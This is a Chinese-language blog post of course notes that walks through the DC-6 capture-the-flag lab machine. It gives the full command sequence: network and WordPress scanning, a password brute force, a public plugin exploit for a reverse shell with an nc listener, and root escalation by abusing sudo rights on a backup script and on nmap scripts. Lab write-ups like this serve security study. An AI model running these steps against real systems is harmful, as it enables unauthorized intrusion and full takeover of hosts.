[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!
往期博客:
第一阶段:
[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)
[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)
第二阶段:
第三阶段:
[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)
[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句
第四阶段:
[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵(本篇)
下期博文:
目录
信息收集
获取IP及目标主机信息
nmap -sP 192.168.1.2/24 -oN nmap.sP
nmap -A 192.168.1.169 -p- -oN nmap.A
添加本地DNS解析
vim /etc/hosts
192.168.1.169 wordy
使用wpscan 扫描
wpscan --url wordy -e u
扫出了网站的登录后台
以及4个用户名
**
作者给出了**使用的密码字典的提示信息,
创建密码字典
cd /usr/share/wordlists
cp rockyou.txt.gz rockyou.txt.gz.bak
gunzip rockyou.txt.gz rockyou.txt
cp /usr/share/wordlists/rockyou.txt /root/dc-6/passwd.dic
创建用户名字典
vim user.dic
暴力**用户名密码
wpscan --url wordy -U user.dic -P passwd.dic
Username: mark, Password: helpdesk01
使用该账密,成功登录网站后台
反弹shell
查找activity monitor 插件是否存在漏洞
searchsploit activity monitor
存在远程执行漏洞可以反弹shell 到本地
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
修改该文件
vim 45274.html
python -m SimpleHTTPServer
当前目录下开启http 服务
本地开启nc 监听2333端口
nc -lvvp 2333
点击Submit request 连接
python -c 'import pty;pty.spawn("/bin/bash")'
反弹shell 成功,进入python 交互式
提权
进入到mark 的家目录下,在stuff 目录下发现things-to-do.txt 文件
得到graham 用户账密
sudo -l
可以发现 jens 用户在没有密码的情况下可以执行backups.sh 文件
我们在backups.sh 文件中添加/bin/bash 命令
echo "/bin/bash" >>backups.sh
sudo -u jens ./backups.sh
成功切换到jens 用户
sudo -l
发现nmap 命令可以在不需要root 用户密码密码的情况下使用
考虑使用nmap 脚本来提权
echo 'os.execute("/bin/sh")' > getShell.nse
sudo -u root nmap --script=getShell.nse
成功拿到flag